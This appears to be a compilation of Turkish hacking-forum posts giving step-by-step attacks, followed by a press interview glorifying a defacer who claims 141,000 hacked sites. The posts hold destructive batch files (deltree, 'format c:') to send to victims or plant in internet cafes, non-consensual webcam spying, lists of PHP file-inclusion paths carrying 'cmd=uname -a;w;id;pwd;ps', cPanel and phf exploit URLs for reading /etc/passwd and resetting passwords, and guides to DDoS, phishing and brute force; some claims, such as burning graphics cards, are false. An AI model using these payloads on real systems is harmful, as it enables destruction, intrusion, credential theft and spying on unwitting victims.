Arama sonucunda 15 adet mesaj bulundu

...: KaRŞı pc ile DaLGa GeÇiN...:

evet arkadaşlar herşey çok basit... sadece size vereceğim kodu çalıştıra yazmak ve 1 kod daha yazıp karşı pc nin ip ini yazmak... çok eğlenceli olacak

Kodlar:

shutdown -i:Uzaktan Kapat’ı aç
shutdown -l:Oturumu Kapat.
shutdown -s:Bilgisayarı kpat.
shutdown -r:Bilgisayarı kapat ve y€niden ßaslat
shutdown -m //bilgisayarad1:Yeniden baslatmak/çıkmak için uzak bilg.
shutdown -t xx:kapatmak için bilgisayar1 xx saniyeye ayarla
shutdown -c:Kapatma yorumu en çok<127 karakter>
shutdown -f:Çalan uygulamalar direkman kapatmaya zorlar
shutdown -d:Kapatma için neden kodu

VE Şimdi :

başlat-çalıştır-cmd yazın.sonra bu komutlardan birini yazdıktan
sonra yanına arkadaşınızın ıp’sini yazın.sonra yazdığınız komuta
göre işlem görsün.

pc açılırken f8 elini bas cek bas cek pc açılna kadar ondan sona siyah bi ekran gelecek mönitöre windosu olan üstü şekilde başlatılsın de başlat bu kadar basit

sevmediğiniz bir internet cafeyiii çok kolay bi yolla gümletin.
herhangi bi masaya oturun biraz takılın kalkmadan az bi zmn öncee
c: nin içinde bulunan autoexec.bat dosyasını not defteriyle aç içine

"format c:/q/autotest"

yazz ve kaydeet(önemli).işte bu kdrrrr.
sora bilgisayar kapanıp açıldığındaaaa formattt
kolay gelsinnnnnnnn

Ekran Karti Yakma(alinti)program Bile Değil Işimizi Yazilarla Hallediyoruz
YAPACAGINIZ İŞLEM

@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: HacKeD gülümse ::.
@echo off3.

METİN SAYFASI AÇIP
kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)
vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda HacKeD By MaNNeR_Boi yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin.

İzinSiz cameRa açma....!

msn de ip bulma işleminin nasıl yapıldıgını bilioruz netsat -n komutuyla karsı tarafın ip ve port numarasını elde ettik

Ör 207.13.13.162:1863 (ip: port) seklinde idi simdi aşşagıda vercegim linkten programı indircez;

link: rapidshare.com /files/15333310...WebcamHack.rar

1.Programı indirdik kurduk (VLC media player)

2.Programı Calıstırıyoruz

3.Dosya>Ağ Akışı Aç dioruz alt tarafta Customize yazan yerin sag tarafına yukarda msn den ipsini ve port numarasını öğrendiğimiz kurbanın adresini ÖNEMLİ====> http://ip: port seklinde yazıoruz ve OK diyoruz.

NOT:Programı internet cafede gördüm ücretli bir adult sitesinin camshow yapan kızlarını izleme için yapılmıs bi program. mantıksal olarak msn de online olan webcamı olan bi kişiyi farkında olmadan görebilioruz yeterki online ve camı olsun..

şimdi ilk önce yeni bir not defteri açıyoruz.sonra alt alta şu şekilde
start
start
start
start
start
start
start
start

bu şekilde ctrl+c (kopyala) ctrl+v (yapıştır) yaparak 1000 tane felan yapıyoruz.artık kaç tane yapıcanız size kalmış ama az yapmayın.sora yukardan dosya bolumune gelip farklı kaydet yapıyoruz.sonra bir isim verip xxxxx.bat yapıyoruz.yani uzantısı bat olacak şekilde kaydediyoruz.artık hazır şimdi bunu rarlıyalım sonra istediğimize gonderelim
hadi size kolay gelsin

Site sonuna

/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?*********
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps

2_
Site sonuna

/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps



/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir=
/includes/header.php?systempath=
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir=
/includes/header.php?systempath=
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/becommunity/community/index.php?pageurl=
/shoutbox/expanded.php?conf=
/agendax/addevent.inc.php?agendax_path=
/myPHPCalendar/admin.php?cal_dir=
/yabbse/Sources/Packages.php?sourcedir=
/zboard/zboard.php
/path_of_cpcommerce/_functions.php?prefix
/dotproject/modules/projects/addedit.php?root_dir=
/dotproject/modules/projects/view.php?root_dir=
/dotproject/modules/projects/vw_files.php?root_dir=
/dotproject/modules/tasks/addedit.php?root_dir=
/dotproject/modules/tasks/viewgantt.php?root_dir=
/My_eGallery/public/displayCategory.php?basepath=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/shoutbox/expanded.php?conf=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/main.php?x=
/main.php?page=
/default.php?page=
/index.php?meio.php=
/index.php?include= | /index.php?inc= | /index.php?page= | /index.php?pag= | /index.php?p=
/index.php?x= | /index.php?open= | /index.php?open= | /index.php?visualizar= | /index.php?pagina=
/index.php?********* | /index.php?cont= | /index.php?c= | /index.php?meio= | /index.php?x=
/index.php?cat= | /index.php?site= /index.php?configFile= | /index.php?action= | /index.php?do=
/index2.php?x= | /index2.php?********* | /template.php?pagina= | /inc/step_one_tables.php?server_inc=
/GradeMap/index.php?page= | /phpshop/index.php?base_dir= | /admin.php?cal_dir=
/path_of_cpcommerce/_functions.php?prefix= | /contacts.php?cal_dir= | /convert-date.php?cal_dir=
/album_portal.php?phpbb_root_path=
/mainfile.php?MAIN_PATH=
/dotproject/modules/files/index_table.php?root_dir=
/html/affich.php?base=
/gallery/init.php?HTTP_POST_VARS=
/pm/lib.inc.php?pm_path=
/ideabox/include.php?gorumDir=
index2.php?includes_dir=
forums/toplist.php?phpbb_root_path=
forum/toplist.php?phpbb_root_path=
admin/config_settings.tpl.php?include_path=
include/common.php?include_path=
event/index.php?page=
forum/index.php?includeFooter=
forums/index.php?includeFooter=
forum/bb_admin.php?includeFooter=
forums/bb_admin.php?includeFooter=
language/lang_english/lang_activity.php?phpbb_root_path=
forum/language/lang_english/lang_activity.php?phpbb_root_path=

CPanel Hack

Bir Sitenin Cpanel Yolunu Bulursanız Bu Kod İle Hosting den Silebilirsiniz.


Kod:
http://www.hedefsite.com:2084/scripts...?domain=(domain) &user=(user)&submit-domain=Terminate

Etkilelenen Sistemler

cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1 .0-R85
cPanel cPanel 9.1

----------------------------------------------------------------------------

Cpanel şifresini email doğrulaması gerektirmeden direk sıfırlar.

http://www.siteadi.com:2082/resetpass/?user=|">ls"|

Uygun Sürümler:
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1

----------------------------------------------------------------------------

Bir sistemde cpanel sql injection ile şifreleri alabilirsiniz:

http://www.siteadi.com:2086/scripts/passwd?password=<> &domain=<>&user=<>

Uygun Sürümler:
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1 .0-R85
cPanel cPanel 9.1

Sitenin Sonuna: admin/configuration.php?gID= (Bu Açığı Ben Buldum)

GOOGLE arama :Powered by Pordus® Copyright

sitenin sonuana eklenecek kod:database/database.mdb

www.örneksite.com/database/database.mdb

sadece açığı olan sitelerde çalışır.

kolay gelsin

Arkadaslar aşşağıda Verdigim Link Ten Programı İndiriyoruz .Program WeB sitesi Acık Tarama Programıdır. Ve Bence Bu Alanda Bir Basyapıttır. Kesinlikle Sonuc Verior İci bos Programlardan Deil Yani. Programın Kullanımı oldukca Basittir ama Ben Biraz Degineyim .Programı Kurduktan Sonrta Karısnıza Dil Secenekleri Gelecek burdan turkish i secelim daha sonra Sunucu Adresi(Ip) : buraya sitenin ip sini yazıyoruz site ip sini Active Whois programından Rahatlıkla BulabilirsiniZ. İp si Girdikten Sonra ’’ Tara ’’ diyoruz ve İslem Bitiyor Program sunucuyu Analiz etmeye Baslıyor Biraz Bekledikten Sonra Acık Elinizde. Kolay Gelsin Umarım İsinize Yarar...

Buyrun açık tarayıcı.

N-Stealth Türkçe - Açık Tarayıcı
rapidshare.com N-Stealth.zip

Active Whois - Site IP si için
rapidshare.com ActiveWhois_-_Admin_Bilgileri.rar.html

Rapidsharede Premiumda Son Nokta !

Rapidshare Sınır Dolduğunda 60 Dakika Beklemek İstemiyorsanız, Cebinizde Kuruş Paranız

Yoksa, Ücretsiz Olarak Hemen Bir Rapidshare Premium Almanızı Tavsiye Ederim.

Ücretsiz Rapidshare premium veren siteler neredeyse yok derecek kadar azdır.

Bu Premium Hizmetini Sağlayan Site Linkini Veriyorum .


LİNK: http://cyber-network.org/rapidsharepremium/


Yukarıdaki Vermiş Olduğum Linke Girerek, Sayfadaki Yazılanları Aynen Uygulayıp Bir

Rapidshare Premium Accountuna Ücretsiz Sahip Olabilirsiniz.
Ben Bu Siteyi Daha Evvel 3 Kez Kullandım Ve 3ündede Olumlu Sonuç Aldım,Rapidshare Premiumuma

Sahip Oldum.Gerçektende Güzel İş Yapıyorlar Ve En Ufak Bir Sorunda İletişimden Yöneticilere

Durumu Arz Edebiliyorsunuz.

Not : Sayfadaki Yazılanları Mutlaka Okumalısınız Aksi Taktirde Yanlıs Bir İşlemde Premiumunuza Sahip Olamayabilirsiniz.

rapidshare.com Deprem_v3.0.rar

EVET ARKADAŞLAR SİZİNLE YENİ BİR HACKİNG DÖKÜMANINDA DAHA BERABERİZ..
HERKESİN DÖKÜMANLARINDA YAZDIĞI VE BENİMDE KULLANMAK İSTEDİĞİM BİR VE BUNU SONUNA
KADAR DESTEKLEDİĞİM ÜÇ KURAL VAR + benim iki kuralım.
1. KURAL : BİR HACKER YADA SALDIRGAN YADA CRACKER KESİNLİKLE SİHİRBAZ YADA BÜYÜCÜ
DEĞİLDİR.HACKER EĞER SİSTEMDE AÇIK VARSA O SİSTEME GİREBİLİR.
2. KURAL : GÜVENLİK İÇİNDE GARANTİ YOKTUR.
3. KURAL : TAMAMEN GÜVENLİ SİSTEM DİYE BİR ŞEY YOKTUR.
4. KURAL : EĞER HACKER OLMAK İSTİYORSANIZ EN UFAK BİLGİYİ BİLE OKUYUM. BU BİLGİ GÜNÜN BİRİNDE GELİR ÇOK İŞİNİZE YARAR.
5. ALTIN KURAL : SİSTEM HAKKINDA KESİNLİKLE BİLGİ EDİNİN.

WEB SİTESİ HACKLEMENİN YOLLARI
A.DDOS
B.FLOOD
C.DOMAİN HACK
D.HOST HACK
E.FTP HACK
F.KOD AÇIKLARI
G.DB HACK
H.ŞİFRE KIRMA
İ.PROGRAMLAR

WEB HACKİNG DÖKÜMANIMIZA BAŞLIYORUZ&l8230;

İsterseniz dokümanımıza en kolay web hack yöntemleri olan hat da hack yöntemi olarak değil de siteyi yayından düşürme görevini üstlenmiş DDos ile başlayalım.

DDos: DDos un amacı herhangi bir sitenin yayınına engel olmaktır.DDos veri tabanı kullanan sitelerde daha fazla etki yapar.Örneğin site php ise mysql site asp ise mdb veri tabanını kullanır.DDos siteye her saniye de bir kullanıcı sokarak veritabanı nın sesionlarını karıştırır ve site iner.Burada ufak bir şey söyleyeyim bu bir yöntem örneğin siz herhangi bir siteye DDos saldırı yapacaksınız.DDos un etkili olabilmesi için sizin bağlantı hızınızın iyi olması gerekir.Bağlantı hızınız iyi değilse siz de DDos yaparken http://www.sitenick.com/index.php gibi bir uzantı kullanırsanız daha iyi olur.Bu durumda sitenin index ini sapıttırırsınız.Sitedeki index bozulur.Şöyle bir hata veriyordu yanlış hatırlamıyorsam &l8220;Genel hata&l8221; gibi bir hata veriyor..

FLOOD: Veritabanı kullanan bir sitenin veritabanını doldurarak bozulmasına ve sitenin çalışmamasına yol açar. Örneğin Denyo ile bir foruma sürekli üye kaydı yaparak veritabanının bozulmasına yol açabilirsiniz.

DOMAİN HACK: Domain hack ikin genel olarak iki yol vardır.Bunlardan birisi Siteye whois çekerek admin mailini öğrenmek ve maili çalmak tır.Diğeri ise sitenin kayıtlı olduğu domain şirketinin db sini elegeçirmektir.
a.Admin mail hack: Admin mail hack için sakın gizli soru tahmini kullanmayın. Çünkü eğer gizli soru tahmin ettiğin zaman eğer şifreyi değiştiriyorsanız bunun hiçbir önemi yok.Zaten bizim mail hackteki amacımız mail şifresini mailinin sahibinin koyduğu şekilde bulmaktır.Bunun bir çok yolu var önce bir whois le admin in mailini öğreneceğiz. Sonra eğer edinebiliyorsak admin hakkında bilgi edineceğiz. Admin eğer fake yiyecek kadar salaksa (hiç sanmam) ben olsam fake yollardım. Ama yollayacağım fake domain şirketinin üye giriş sayfası gibi olmalı ve mail aracılığı ile uygun bir mail adresi ile yollanmalı. Buna admin inanmalı.
Eğer admin hakkında bilgi toplayabildiyseniz kendinize göre bir dictionary oluşturun. Ve saldırı yapın. Dictionary admin hakkında topladığımız bilgilere göre yapacağız ama nasıl? Admin hakkında nerede oturduğunu felan altık hangi şehir kaç yaşında doğmuş vb vb vb. Admin zannediyorum oturduğu apartmanın adını koymaz. Sizde dictionary hazırlarken buna dikkat ediniz adam çocuğunun adını koyabilir büyük küçük harfle karışık koymuş olabilir ve benzeri. Siz böyle bir dictionary hazırlamalısınız.
Brute force : Bu yöntem genellikle bana göre pek başarılı olmamıştır. Gine de şifre kombineleri ile saldırıp kırabiliriz. Eğer şanslıysan kısa zamanda kırabilirsin.
b.Ayrıca başka bir yöntemde domainin kayıtlım olduğu sitenin db sini ele geçirmektir.

HOST HACK : Eğer hotsu hack etmek istiyorsak öncelikle sistemin nasıl çalıştığını ve sistem hakkında bilgiler edinmemiz gerekir. Sistemin çalışma şekli zaten genelde iki şekildedir. Windows ve Linux.

a. Windows : şimdi burada ufak bir ayrıntıya değinmek istiyorum. Eğer site asp ise Windows server ISS üzerine kuruludur. Eğer site php ise o zaman Linux da apache üzerine kuruludur. Eğer sitenin server i ISS 4.0 yada bunun altı ise o zaman sitede msdac.dll açığı vardır. O zaman perl de whisker exploitini derleyip çalıştıralım sonuca ulaşacağız. Eğer server ISS 4.0 ın üstünde bir serverse o zaman sitede kod açıkları bulmamız gerekecektir. Bunu n-stealth adlı programla yapabiliriz.Eğer açık bulursanız dalarsınız.Eğer dalınacak gibi bir açık değilse ve risk seviyesi yüksek ise o zaman o açığın exploiti vardır. Explotiti bulup derleyin çalıştırın sonuca ulaşacaksınız. Eğer risk seviyesi yüksek bir açık bulamadı iseniz o zaman domain hackte olduğu gigib bir wordlist hazırlayıp admin şifresini kırmaya çalışınız yada ftp şifresini kırmaya çalışınız.
b. Linux : Sitede bu durumda php oluyor. Eğer site php ise o zaman eski yöntemlerden yeni yöntemlere doğru bir deneme yapın eski bir yöntem olan / /ETC açığına bakın. Eğer varsa içinde mutlaka password.bak dosyası vardır onu alın ve kırın.
========================/ETC=========================== =
Selamlar... Bu yazıda daha basit ama daha hızlı bir hack yöntemini anlatacağım
Bu yöntem çok hoşunuza gidecek Gerekli Programlar : Internet Explorer
haricinde bir web browser, Cracker Jack ve tabiki Meliksah Ozoral&l039;s Dict Maker.
--------------------------------------
Mantık : phf sistemlerde bulunan bir açıktır ve bu acık sayesinde sisteme
web uzerinden baglanip shellde bazi komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
--------------------------------------
Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan
passwd dosyasini alabilir ve kirabilirsiniz...Bu olay web uzerinden
olur ve hizli olur |~ eNJOy!
--------------------------------------
Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin sonu asagidaki
satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar.../cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlarsistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd
etc dizinin altindaki passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki dosyalar
goruntulenir.../cgi-bin/phf?Qalias=x%0als%20pass*
yazarsaniz bulundugunuz dizinde pass ile baslayan butun dosyalari listeler...
Komutun Kullanimi Kolay!
Simdi Biraz Ornek Cozelim!
--------------------------------------
=========================/ETC=========================== ===

Eğer bu açık yoksa sizde cgi/phf?qalias (cgi açıkları) yollarını deneyin. Açığı bulursanız bu yollarsa siteye girebilirsiniz. Cgi açıkları bulun. Eğer giremediyseniz brute force kullanın buda olmadı ise gine n-stealth ile bi açık taraması yaptırın ve risk seviyesi yüksek bir açık bulursanız exploit ini bulun ve derleyip çalıştırın. Sonuca ulaşın.

FTP HACK : Sitenin ftp adresini bulun ve bir brute yada dictionary ile saldırın belki kırarsınız. Ben böylelikle site hackledim.

KOD AÇIKALRI : Siteyi n-stealth la taratın ve açık arayın gine risk seviyesi yüksek açık bulursanız exploitini bulun. Cgi açıkları deneyin. Cgi açıkları html siteler içinde işe yarar. Programlama dili öğrenin. Siteler için her zaman bulunan açıklardan haberdar olun. Kendi açığınızı kendiniz bulmaya çalışın. Deneyin. Ör asp sitelerde or açığı bunun gibi açıklar bulun. Fso açıkları bunları deneyin.

DB HACK : Sitenin herhangi bir yolla db sine ulaşmaya çalışın ve db ye ulaşınca şifreyi kırın hiç denemedim ama bir deneyin siteyi herhangi bir programla pc nize indirin ve belki içinde db vardır bulursunuz. Google ile hack yapabilirsiniz. Site hakkında bilgi topladınız bu önemli idi aynı siteden sizde kurun ve db sinin yerini öğrenin buda iyi bir hacking yöntemidir..
======google======
İnurl:&l8221;db.mdb&l8221; gibi googlede aratın
======google======

ŞİFRE KIRMA : Herhangi bir programla yada mantığınız la admin mailini db nin şifresini admin giriş panelinin şifresini ve bunun gibi şeylerin şifresini kırın. Örnek verecek olursak unsecure ile şifre kırabilirsiniz.

PROGRAMLAR : Herhangi bir programla örneğin mass scanner ile herhangi bir hotsa bağlanın ve teker teker siteleri indirin. !

Dünyaca Ünlü Hacker'ımız Konuştu
http://img59.imageshack.us/img59/880...rk454517up.jpg

O, hacker’lık aleminin son efsanesi. Bir Türk, lakabı İskorpitx. Hack'lediği 141 bin siteyle dünyada bir numara. Ünlü Hacker İskorpitx ilk kez konuştu.
Tüm dünyadan hacker’ların, çökerttikleri siteleri kaydettikleri, İtalyan güvenlik sitesi Zone-h’de, hack’lediği 141 bin siteyle ilk sırada. Önce Microsoft’un Meksika sitesini hack’lemesi olay oldu. 17 Mayıs’ta 43 bin siteyi 10 dakika içinde çökertmesiyle asıl sükseyi yaptı. Hack’lediği sitelere üzerinde Atatürk resmi olan bir Türk bayrağı ve PKK, Yunanistan, Fransa ve Ermenistan’la ilgili küfürlü bir mesaj bırakıyor.

Ancak onun hakkında, zehirli iskorpit balığından türettiği ismi ve yaşı dışında hiçbir şey bilinmiyordu. Baktık olmayacak, İskorpitx’in peşine düştük. İzini bulmamız iki gün sürdü. Önce web site tasarımcısı bir arkadaşına ulaştık. E- posta ile konuşma isteğimizi bildirdik. Uzun uzun derdimizi anlattık. Ertesi gün ikna oldu. Bizimle telefonla bağlantıya geçti. İskorpitx, 45 yaşında, Ege’de yaşıyor ve muhasebecilik yapıyor. Meğer bu hacker’lık işlerine de, internette tavla oynarken puanları çalınınca başlamış.

Nasıl başladınız bu işlere?

- Hacker’lıkla 2002’den beri ilgileniyorum. Bir hobi gibi. turk.net’te sanal tavla oynarken başladı bu merakım aslında. Bir gece oyunda tüm puanlarımı çaldılar. Çok da uğraşmıştım onları biriktirmek için. turk.net’in operatörlerine bildirdim durumu ama hiç ilgilenmediler. Ben de bunu nasıl yaptıklarını merak ettim ve kurcalamaya başladım. Kısa süre sonra, ne kadar puan varsa ele geçirdim. Muhasebeciyim aslında. 1989’da bilgisayarla muhasebe tutulmasına izin verildiğinden beri, bilgisayarla iç içeyim. Şimdi 45 yaşındayım, hálá boş zamanlarımda uğraşıyorum.

Dünyada hacker’lıkla ilgilenen herkes tanıyor sizi. Bu nasıl oldu?

- Beni Microsoft’un Meksika sitesini hack’ledikten sonra tanıdı çoğu insan. Microsoft’u hack’lemenin anlamı benim için çok büyük.

Peki, 17 Mayıs’ta 43 bin siteyi çökertirken bir amacınız var mıydı?

- Ermeni yasa tasarısı.

Kendinizi sanal ortamda bir savaşçı olarak mı görüyorsunuz?

- Yakında savaş meydanları, silahlar kalmayacak, tüm savaşlar dijital ortamda yapılacak zaten. Türk siteleri, PKK sempatizanları tarafından sürekli tehdit ediliyor. Sitelere Apo resmi ve marşlar bırakıyorlar. KKTC sitelerine de Rumlar saldırıyor. Bush Türkiye’ye geldiğinde, Brezilyalılar Türk sitelerine karşı savaş ilan etmişti. Binlerce siteyi korumaya aldım. Bunlardan biri de, KKTC Bayrak Radyo TV’nin sitesiydi. Sitenin webmaster’ı benimle bağlantıya geçip, işi devralana kadar, siteyi Rum hacker’lardan korudum. İskorpitx’in kötü bir amacı yok. Türklere karşı dijital ortamda yapılanlara bir karşılık vermek amacım. Bilişim alanında biz de varız demek. ABD ve Avrupalılara aslında ne kadar içi boş bir teknolojiye sahip olduklarını göstermek. Halkın duygularına tercüman olduğumu düşünüyorum. Ermeniler konusundaki suçlamalar çok ağır. Onlar bizim yumuşak tarafımızı buluyorlar. Biz de sanal ortamda onlara karşılık veriyoruz. Sitelere bıraktığım küfürlü mesaj, benim üslubum değil aslında. Ama böyle olmasını onlar istiyor.http://img230.imageshack.us/img230/8483/162217217hb.jpg (http://imageshack.us/)

SİTELERİ GÜNDEME GÖRE HACK’LİYORUM

Hack’leyeceğiniz siteleri neye göre seçiyorsunuz?

- Siteleri biraz gündem belirliyor. Danimarka’daki karikatür krizi zamanında da, Danimarka sitelerine karşı saldırılar yaptım mesela. Türk sitelerine kesinlikle el sürmüyorum. Tehlikede olanları koruyorum.

Ama Antakya Devlet Hastanesi’nin sitesi gibi Türk kamu sitelerinde de sizin mesajınızı görüyoruz.

- Hosting şirketleri üzerinden binlerce site tarıyorum. Arada Türk siteleri de karışabilir. Örneğin geçen gün ABD’li bir şirketten hosting alan Digiturk’ün sitesi karşıma çıktı. Yalnızca uyarı mesajı gönderdim. Türk sitelerini kullanım dışı bırakmak gibi bir amacım yok. Yalnızca güvenlik açıklarını gördüğümde uyarıyorum.

Sizi rekortmen hacker yapan şey nedir?

- Yüzde yüz Türk yapımı bir yazılım kullanıyorum. 15 saniyeden daha az sürede, üç bin 500 siteye ulaşabiliyorum. Zaten işinizi en çok 10 dakikada bitirmeniz gerekiyor. Özellikle ABD’deki siteler, çok oyalanan hacker’ları fark edebiliyor. 43 bin siteyi, 10-12 dakika içinde hack’ledim. Böyle hızlı olamadıkları için bu kadar başarılı olamıyorlar.

Bu bilgi ve yeteneğinizi hacker’lıktan başka şeyler için kullanıyor musunuz?

- Hacker’lar kara ve beyaz olarak ikiye ayrılır. Kara olanlar, son olarak Gima’ya yapılan saldırıdaki gibi kredi kartı kopyalayan hacker’lar. Ben böyle bir hacker olsaydım, inanın tüm hacker’lardan daha çok kredi kartı bilgisine sahip olurdum. Ama şu anda cezaevinde olurdum herhalde. Ben internette karşıma çıkan database’leri yok ediyorum, benden sonra gelen hacker’lar bulmasın diye. Bu kötü niyetli insanlar, kolayca yakalanıyor.

Türklerin hacker’lıkta Brezilyalıları bile geride bıraktığı yönünde haberler çıkıyor. Sizce neden Türkler hacker’lığa merak saldı?

- Ben ADSL’in yaygınlaşmasını büyük bir etken olarak görüyorum. Eski bağlantılarla hacker’lık yapılamazdı zaten. Genç insan sayısı çok ve hepsi de inanılmaz yetenekli. Bilgisayar merakı ve zeka biraz fazla oldu mu, gençler hacker’lığa sarıyor.

İSKORPİTX OLDUĞUMU AZ KİŞİ BİLİYOR

İskorpitx, iskorpitten geliyor. Türkiye’de çoğunlukla Ege Denizi’nde bulunan, çarpan balığının ismi. İnsana çarptığında, deriyi şişiren bir tür zehirli balık. İskorpitx olduğumu, ailem ve çalışma arkadaşlarım biliyor sadece. Küçük bir yerde yaşadığım için kolayca duyulabilir ve deşifre olabilirim. Çok büyük şirketler ve sitelerle uğraştığım için beni çekemeyen pek çok insan var.

SAHTEKARLIĞA GİRMEDİĞİM İÇİN İÇİM RAHAT

Yeni bilişim yasasına göre, evinizden hacker’lık yapınca suçlu, internet kafeden yapınca suçlu olmuyorsunuz. Böyle saçmalıklar var. Ama yasadan önce de, yurtiçinden hiçbir siteyle uğraşmadığım, sahtekarlığa girmediğim için içim rahat. Benim amacım protesto. Yabancı siteleri hack’leyerek Türklerin sesini duyuruyorum